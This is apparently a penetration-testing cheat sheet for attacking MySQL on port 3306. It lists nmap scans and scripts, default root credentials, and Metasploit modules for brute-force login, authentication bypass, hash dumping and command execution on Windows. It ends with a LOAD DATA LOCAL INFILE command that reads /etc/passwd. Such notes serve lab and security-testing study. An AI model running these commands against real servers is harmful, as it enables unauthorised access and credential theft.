Port 3306 - mysql
Connect
Install mysql client
sudo apt install default-mysql-client
Local
mysql --user=root --password=password
Remote
mysql -h $(target) --user=root --password=password
Mysql Commands
show databases;
use <database-name>;
show tables;
select * from <table-name>
Nmap
sudo nmap -p3306 -Pn -sS -sC -sV $(target) | tee nmap.mysql
Nmap - Script mysql-enum
nmap -p3306 --script=mysql-enum $(target)
- mysql-audit
- mysql-databases
- mysql-dump-hashes
- mysql-empty-password
- mysql-enum
- mysql-info
- mysql-query
- mysql-users
- mysql-variables
- mysql-vuln-cve2012-2122
use auxiliary/admin/mysql/mysql_sql
set USERNAME root
set PASSWORD password
set RHOST 10.10.125.83
run
- use auxiliary/scanner/mysql/mysql_login
- auxiliary/scanner/mysql/mysql_version
- auxiliary/scanner/mysql/mysql_authbypass_hashdump
- auxiliary/scanner/mysql/mysql_hashdump #Creds
- auxiliary/admin/mysql/mysql_enum #Creds
- auxiliary/scanner/mysql/mysql_schemadump #Creds
- exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds
MySQL arbitrary read file by client
mysql> load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';